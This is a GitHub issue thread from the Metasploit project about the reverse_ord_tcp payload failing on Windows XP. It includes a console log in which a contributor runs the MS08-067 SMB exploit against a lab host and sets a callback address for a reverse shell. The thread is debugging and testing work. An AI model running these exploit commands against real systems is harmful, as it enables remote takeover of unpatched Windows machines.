Open bwatters-r7 opened 2 years ago
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
[*] 10.5.132.115:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
That likely isn't going to end well, given that the payload suggests No NX or Win7.
Although confusingly the documentation later uses a Windows XP SP2 target with AlwaysOn NX:
This payload was designed during the Windows XP SP2 era. Apparently it was a rockin Windows payload in 2005. Perhaps this stopped working in the Windows XP SP3 / Windows 7 era?
I'm not entirely clear on the use case of this payload type - is it just the size?
You can find some details in the slides from "Beyond EIP" (pages 14 to 16) presented at BlackHat Briefings by spoonm and skape in 2005.
These payloads use a technique discussed in Oded Horovitz's lightning talk at CanSecWest/core04. I wasn't able to find details about the lightning talk, but Matt Conover and Oded Horovitz presented "Reliably Exploiting Windows Heap Overflows" at core04, so perhaps the technique was discussed during the presentation. Matt and Oded presented a bunch of heap exploitation related work for Windows 2000 to Windows XP SP2 in 2004/2005.
As you suggest, the primary benefit is the size due to leveraging in-memory WS2_32.dll. Apparently the technique also works on Windows 9x systems. Static addresses are nice too.
For what it is worth, this payload failed on Windows XP SP0 for me too.
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
4 Windows XP SP2 English (AlwaysOn NX)
5 Windows XP SP2 English (NX)
6 Windows XP SP3 English (AlwaysOn NX)
7 Windows XP SP3 English (NX)
[...]
msf6 exploit(windows/smb/ms08_067_netapi) > set target 2
target => 2
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_ord_tcp
payload => windows/shell/reverse_ord_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.200.212
rhosts => 192.168.200.212
msf6 exploit(windows/smb/ms08_067_netapi) > check
[+] 192.168.200.212:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.212:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.212
[-] Command shell session 1 is not valid and will be closed
[*] 192.168.200.212 - Command shell session 1 closed.
^C[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms08_067_netapi) > set target 0
target => 0
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.212:445 - Automatically detecting the target...
[*] 192.168.200.212:445 - Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] 192.168.200.212:445 - Selected Target: Windows XP SP0/SP1 Universal
[*] 192.168.200.212:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.212
[-] Command shell session 2 is not valid and will be closed
[*] 192.168.200.212 - Command shell session 2 closed.
Based on the documentation here: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/windows/shell/reverse_ord_tcp.md I should be doing this right, but the result is no session, and a crashed smb service:
Success if I just use reverse_tcp: